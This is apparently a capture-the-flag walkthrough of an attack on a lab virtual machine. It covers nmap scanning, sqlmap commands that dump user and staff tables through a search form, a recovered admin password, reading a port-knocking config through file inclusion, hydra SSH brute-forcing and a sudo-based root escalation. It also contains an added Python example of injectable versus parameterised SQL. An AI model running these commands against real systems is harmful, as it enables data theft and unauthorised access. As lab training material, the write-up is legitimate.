1. Host discovery
Nmap -sP 192.168.43.0/24
C:\Users\ASUS>Nmap -sP 192.168.43.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:53 中国标准时间
Nmap scan report for 192.168.43.79
Host is up (0.0010s latency).
MAC Address: 00:0C:29:B7:B6:AD (VMware)
Nmap scan report for 192.168.43.131
Host is up (0.0060s latency).
MAC Address: 46:EC:05:32:DF:DA (Unknown)
Nmap scan report for 192.168.43.193
Host is up (0.0020s latency).
MAC Address: 00:0C:29:D4:89:D8 (VMware)
Nmap scan report for 192.168.43.244
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 39.40 seconds
2. Information gathering
Port scan
C:\Users\ASUS>Nmap -A 192.168.43.79 -p- -oN nmap.A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:55 中国标准时间
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:00:05 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 11:55 (0:00:00 remaining)
Nmap scan report for 192.168.43.79
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:B7:B6:AD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.43.79
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.63 seconds
Visit the web interface
3. Exploitation
Try SQL injection
The web interface has four buttons, and one of them leads to a form, so use sqlmap to try injecting into it. First enumerate the databases:
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" --dbs
List the tables
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D users --tables
Dump the fields of the table
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D users -T UserDetails --dump
Field contents
The users table holds the account names and passwords of a number of users.
Next, look at what is in the Staff database.
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D Staff --tables
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D Staff -T StaffDetails --columns --batch
Look at the field contents of the Users table in the Staff database
sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D Staff -T Users --dump --batch
Here sqlmap cracked the password hash for us directly, so the credentials can be used to log in right away.
Log in as admin
admin:transorbital1
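The defect that lets sqlmap dump these tables, shown as an added example (not code from the write-up or from the target machine): the POST value of the results.php search form is concatenated into the SQL text, and the fix is to bind it as a query parameter. The StaffDetails table name comes from the page; its columns, the rows, and the helper names are assumptions made up for this example.

```python
import sqlite3

# Constructed in-memory stand-in for the Staff database the write-up dumps.
# Only the table name is from the page; columns and rows are assumptions.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE StaffDetails (id INTEGER, firstname TEXT, position TEXT)")
    conn.executemany("INSERT INTO StaffDetails VALUES (?, ?, ?)", [
        (1, "Alice", "Admin"),
        (2, "Bob", "Reception"),
        (3, "Carol", "Engineer"),
    ])
    return conn

def search_vulnerable(conn, search):
    # The pattern behind a search form like results.php: the submitted value is
    # spliced into the SQL text, so a quote character rewrites the WHERE clause.
    sql = (f"SELECT firstname FROM StaffDetails "
           f"WHERE firstname LIKE '%{search}%' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]

def search_safe(conn, search):
    # Fix: bind the value as a parameter. The driver passes it as data, so it is
    # matched literally and never parsed as SQL, whatever characters it contains.
    sql = "SELECT firstname FROM StaffDetails WHERE firstname LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (f"%{search}%",))]

if __name__ == "__main__":
    db = build_db()
    # A normal search and a classic tautology input, run through both versions.
    for query in ("Ali", "' OR '1'='1"):
        print(repr(query), search_vulnerable(db, query), search_safe(db, query))
```

The tautology input returns every row from the vulnerable version and nothing from the parameterised one, which is the behaviour sqlmap probes for when it tests the search field.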
Trying to log in over SSH as admin fails.
After logging in to the web interface, a file inclusion vulnerability is found.
The box may be running the port-knocking service knockd,
so read the contents of its configuration file /etc/knockd.conf.
Use Nmap to try the ports
Check whether port 22 is now open
Try logging in to the system over SSH
Logging in here requires a key pair.
Build a wordlist from the information in the Users database and brute-force with it
hydra -L usera -P passwda 192.168.43.79 ssh
SSH login as janitor
ssh janitor@192.168.43.79
After logging in, a password file is found; add its contents to the password list used just now and brute-force again.
hydra -L usera -P passwda 192.168.43.79 ssh
This time an extra user, fredf, shows up; log in over SSH to take a look.
4. Privilege escalation
After logging in, run sudo -l to check for commands that can be executed with administrator privileges
A Python script can be executed with sudo.
Generate an encrypted password (hash) on Kali
Write the command that creates the user into it, then execute the script.